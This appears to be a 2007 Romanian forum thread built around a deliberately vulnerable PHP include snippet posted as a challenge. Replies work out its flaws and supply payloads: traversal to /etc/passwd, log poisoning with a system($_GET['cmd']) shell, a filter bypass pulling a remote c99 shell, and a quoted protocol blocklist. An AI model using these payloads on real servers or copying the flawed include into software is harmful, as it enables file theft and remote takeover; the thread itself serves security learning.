kw3rln Posted September 3, 2007 Report Share Posted September 3, 2007 <?phpif(isset($_REQUEST['doc'])){ $doc = $_REQUEST['doc']; //Anti RFI-protection $doc = str_replace('http://','',$doc); include($doc);}?>vulnerabil la 3 atacuri, vedeti care-s alea Quote Link to comment Share on other sites More sharing options...
amprenta Posted September 3, 2007 Report Share Posted September 3, 2007 pai ar fi path disclosure -adica doc=cacat .. ne va da o eroare Warning ..... NO SUCH file or directoy in" /home/draci/public_html/raha.php" file disclosure - doc=../../../../etc/passwd de ex Quote Link to comment Share on other sites More sharing options...
x.o Posted September 3, 2007 Report Share Posted September 3, 2007 LFI,Remote command execution + rfi Quote Link to comment Share on other sites More sharing options...
kw3rln Posted September 3, 2007 Author Report Share Posted September 3, 2007 yep.. da si rfi ii Quote Link to comment Share on other sites More sharing options...
vladiii Posted September 3, 2007 Report Share Posted September 3, 2007 yep.. da si rfi ii Am fost primul care ti-a zis pe mess de asta Quote Link to comment Share on other sites More sharing options...
moubik Posted September 4, 2007 Report Share Posted September 4, 2007 da, era evident pacat ca nu am fost in weekend aici Quote Link to comment Share on other sites More sharing options...
Imperfect Posted October 9, 2007 Report Share Posted October 9, 2007 kw3rln , mai fa challengeuri de genu asta ^'> ! Quote Link to comment Share on other sites More sharing options...
michee Posted October 27, 2007 Report Share Posted October 27, 2007 daca se poate sa ma lamuriti si pe mineremote code execution cred c-ar fi daca fac ceva de genul doc = <? system($_GET['cmd'])?> , imi logheaza asta intr-un loc apache si apoi folosesc LFI ca sa-l execut, nu ?RFI cum se face?merge sa includ un fisier remote daca fac doar doc='www.hackserver.com/cmd.php' de exemplu? adik fara http in fata?saum cum se face RFI aici?' Quote Link to comment Share on other sites More sharing options...
michee Posted October 28, 2007 Report Share Posted October 28, 2007 si tot nu m-ai lamurit..... Quote Link to comment Share on other sites More sharing options...
kw3rln Posted October 28, 2007 Author Report Share Posted October 28, 2007 si tot nu m-ai lamurit.....avem $doc = str_replace('http://','',$doc); da?dak pui $doc= httphttp://://site.com/c99.txt?ce se intampla? Quote Link to comment Share on other sites More sharing options...
michee Posted October 28, 2007 Report Share Posted October 28, 2007 hahaha:))da,frumos. Quote Link to comment Share on other sites More sharing options...
lucian Posted October 28, 2007 Report Share Posted October 28, 2007 la rfi ar mai merge si ftp://user:pass@host/fisiersi teoretic cred ca merge si mms://host/fisiersau gopher ... acu nu sunt sigur ... ca merg astea ... le-a incercat cineva? ... fiindca am vazut in mai multe site-uri ca se facea verificarea url-ului daca contine si protocoalele ftp ... telnet ... mms ... gophergen ... if(!eregi("(http://|https://|ftp://|telnet://|mms://|gopher://|news://) ..... Quote Link to comment Share on other sites More sharing options...
